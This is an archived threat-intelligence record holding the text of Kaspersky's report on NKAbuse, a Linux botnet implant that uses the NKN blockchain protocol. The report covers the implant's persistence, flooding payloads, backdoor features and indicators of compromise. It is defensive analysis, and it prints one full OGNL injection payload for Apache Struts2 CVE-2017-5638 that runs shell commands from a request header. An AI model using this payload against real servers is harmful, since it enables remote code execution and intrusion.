{
	"id": "e9c159af-0e7a-4cc5-80ab-44d23b9f9e8e",
	"created_at": "2026-04-06T00:16:41.430465Z",
	"updated_at": "2026-04-10T03:24:29.403005Z",
	"deleted_at": null,
	"sha1_hash": "daebaf0e378fc11ad510c22584e45580cf068611",
	"title": "Unveiling NKAbuse: a new multiplatform threat abusing the NKN protocol",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 286979,
	"plain_text": "Unveiling NKAbuse: a new multiplatform threat abusing the NKN\r\nprotocol\r\nBy Kaspersky GERT\r\nPublished: 2023-12-14 · Archived: 2026-04-05 22:36:22 UTC\r\nDuring an incident response performed by Kaspersky’s Global Emergency Response Team (GERT) and GReAT,\r\nwe uncovered a novel multiplatform threat named “NKAbuse”. The malware utilizes NKN technology for data\r\nexchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor\r\ncapabilities. Written in Go, it is flexible enough to generate binaries compatible with various architectures.\r\nOur analysis suggests that the primary target of NKAbuse is Linux desktops. However, in view of its ability to\r\ninfect MIPS and ARM systems, it also poses a threat to IoT devices.\r\nNKAbuse infiltrates systems by uploading an implant to the victim host. The malware establishes persistence\r\nthrough a cron job and installs itself in the host’s home folder. Its capabilities span flooding, backdoor access and\r\nremote administration (RAT), offering a range of features.\r\nA new kind of network\r\nNKN, short for “New Kind of Network”, functions as a peer-to-peer (P2P) and blockchain-oriented network\r\nprotocol that prioritizes decentralization and privacy. The NKN network currently has more than 180,000 official\r\nnodes. It offers diverse routing algorithms designed to optimize data transmission by selecting the shortest node\r\ntrajectory to reach its intended destination.\r\nNKN data routing diagram\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 1 of 7\n\nHistorically, malware operators have exploited new and emerging communication protocols like NKN to link up\r\nwith their command-and-control servers (C2) or bot masters. 
This threat (ab)uses the NKN public blockchain\r\nprotocol to carry out a large set of flooding attacks and act as a backdoor inside Linux systems.\r\nA not-so-new attack vector\r\nEvidence collected and analyzed by GERT suggests that this attack exploited an old vulnerability related to\r\nStruts2 (CVE-2017-5638 – Apache Struts2), targeting a financial company.\r\n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?\r\n(#_memberAccess=#dm):((#cont\r\nainer=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.g\r\netInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNam\r\nes().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(\r\n#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')).(#cmds=@java.n\r\net.URLDecoder@decode(#req.getHeader('shell'),'UTF-8')).(#cmd={'/bin / bash', ' - c',\r\n#cmds}).(#p = new java.lang.ProcessBuilder(#cmd)).(#p.redirectErrorStream(true)).(#process\r\n= #p.start()).(#ros =\r\n(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.c\r\nommons.io.IOUtils@copy(#process.getInputStream(), #ros))\r\nLog evidence obtained from the exploited WebService\r\nThe excerpt from the audit logs shown above is the same as that referenced in the vulhub POC S2-048. The\r\nvulnerability allows the attackers to execute commands on the server by passing the command in a header\r\nidentified as “shell” and sending the instructions to Bash for execution. After the vulnerability is exploited, a\r\ncommand is executed on the system to download the initial script.\r\nA new multiplatform implant\r\nThe malware is typically installed on the victim’s device by executing a remote shell script that downloads and\r\nexecutes the contents of the setup.sh shell script hosted by the attacker remotely. 
The setup process checks the OS\r\ntype and, depending on that, it downloads the second stage, which is the actual malware implant. The implant is\r\ndownloaded from the same server; it is named “app_linux_{ARCH}”, where “{ARCH}” is the target OS\r\narchitecture. The downloaded implant is placed into the temporary /tmp directory and then executed. There are\r\neight architectures hosted on that server and supported by the malware:\r\n386\r\narm64\r\narm\r\namd64\r\nmips\r\nmipsel\r\nmips64\r\nmips64el\r\nThis analysis will focus on the amd64 (x86-64) version.\r\nOnce executed, the malware checks if it is the only instance running and moves itself to a safe place instead of\r\nremaining in the volatile /tmp directory. The directory chosen by the implant to reside in is\r\n/root/.config/StoreService/. Another set of directories created inside that destination path is files and .cache. Then\r\nthe implant retrieves the infected machine’s IP address by sending a GET request to ifconfig.me, loads the default\r\nconfiguration, which checks if it is located inside the .cache directory and, if not, loads certain hardcoded settings.\r\nLoading and setting up the default configuration\r\nThis configuration is then saved to a new cache structure, which holds other important repeatedly reused settings,\r\nsuch as the generated private key.\r\nNKAbuse makes use of cron jobs to survive reboots. To achieve that, it needs to be root. It checks that the current\r\nuser ID is 0 and, if so, proceeds to parse the current crontab, adding itself for every reboot.\r\nA new communication\r\nNKAbuse utilizes the NKN protocol to communicate with the bot master and receive/send information. 
To do this,\r\nthe malware implant creates a new account and a new multiclient, which enables it to send and receive data from\r\nmultiple clients concurrently, increasing the reliability of its communications with the bot master.\r\nThe NKN account is created with the default config options, and then the multiclient is initialized with an\r\nidentifier which in our sample is a 64-character string representing the public key and remote address used by\r\nthe malware.\r\nNKAbuse setting up the NKN client structure with the help of a hardcoded public key\r\nAs soon as the client is set up and ready to receive and send data, the malware establishes a handler to accept\r\nincoming messages sent by the bot master. The handler contains 42 or so cases, each performing different actions\r\ndepending on the “code” sent, and waits for more messages to arrive.\r\nNKAbuse contains a large arsenal of Distributed Denial of Service (DDoS) attacks. Below is a list of the flooding\r\npayloads.\r\nCommand Attack\r\nDefault/0 http_flood_HTTPGetFloodPayload\r\n1 http_flood_HTTPPostFloodPayload\r\n2 tcp_flood_TCPFloodPayload\r\n3 udp_flood_UDPFloodPayload\r\n4 ping_flood_PINGFloodPayload\r\n5 tcp_syn_flood_TCPSynFloodPayload\r\n6 ssl_flood_SSLFloodPayload\r\n7 http_slowloris_HTTPSlowlorisPayload\r\n8 http_slow_body_HTTPSlowBodyPayload\r\n9 http_slow_read_HTTPSlowReadPayload\r\n10 icmp_flood_ICMPFloodPayload\r\n11 dns_nxdomain_DNSNXDOMAINPayload\r\nAll these payloads have historically been used by botnets, so, when combined with NKN as the\r\ncommunication protocol, the malware can asynchronously wait for the master to launch a combined attack. It is\r\nimportant to note that the last type of payload attack differs from the others. 
NKAbuse overflows a DNS server\r\nwith junk DNS requests (type AAAA), causing it to try to resolve “{JUNK}.google.com” subdomains, where\r\n{JUNK} is a randomly generated subdomain name in the 0-9a-zA-Z format.\r\nA new backdoor with RAT capabilities\r\nNKAbuse has multiple features that turn it into a powerful backdoor or a remote access trojan (RAT), not just a\r\nDDoS tool. In fact, most of the message commands mentioned above are, in one way or another, used for\r\npersistence, command execution, or information gathering.\r\nThe malware implant establishes a structure named “Heartbeat”, which talks to the bot master at regular\r\nintervals. It contains a number of other structures that store information about the infected host: the PID, the\r\nvictim’s IP address, free memory, current configuration, and so on.\r\nAnother feature of this malware is the ability to make screenshots of the infected machine. It uses an open-source\r\nproject to determine the display bounds and then capture an image of the current screen, in order to convert it to\r\nPNG and send it to the bot master.\r\nCapturing screenshots\r\nNKAbuse can also create files with specific content, remove files from the file system, and fetch a file list from a\r\nspecific path. It can get a list of processes running in the system and even a detailed list of the available network\r\ninterfaces. Another common feature that makes this implant a full-fledged backdoor is the ability to run system\r\ncommands. These are executed on behalf of the current user, and the output is sent via NKN to the bot master.\r\nA new threat\r\nAlthough relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out through their\r\nutilization of less common communication protocols. 
This particular implant appears to have been meticulously\r\ncrafted for integration into a botnet, yet it can adapt to functioning as a backdoor in a specific host. Moreover, its\r\nuse of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet\r\nto expand steadily over time, seemingly devoid of an identifiable central controller.\r\nAdditionally, it was confirmed that the malware has no self-propagation functionality, which means the initial\r\ninfection vector is delivered by someone who exploits a vulnerability to deploy the sample.\r\nOur telemetry data shows that there are victims in Colombia, Mexico, and Vietnam. All Kaspersky products detect\r\nthe threat as HEUR:Backdoor.Linux.NKAbuse.a.\r\nA more detailed analysis of the latest NKAbuse versions is available to customers of our private Threat\r\nIntelligence Reports. With any requests on the subject, please contact crimewareintel@kaspersky.com.\r\nIndicators of compromise\r\nHost-based:\r\nMD5: 11e2d7a8d678cd72e6e5286ccfb4c833\r\nFiles created:\r\n/root/.config/StoreService\r\n/root/.config/StoreService/app_linux_amd64\r\n/root/.config/StoreService/files\r\n/root/.config/StoreService/.cache\r\nSource: https://securelist.com/unveiling-nkabuse/111512/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/unveiling-nkabuse/111512/"
	],
	"report_names": [
		"111512"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434601,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.pdf",
		"text": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.txt",
		"img": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.jpg"
	}
}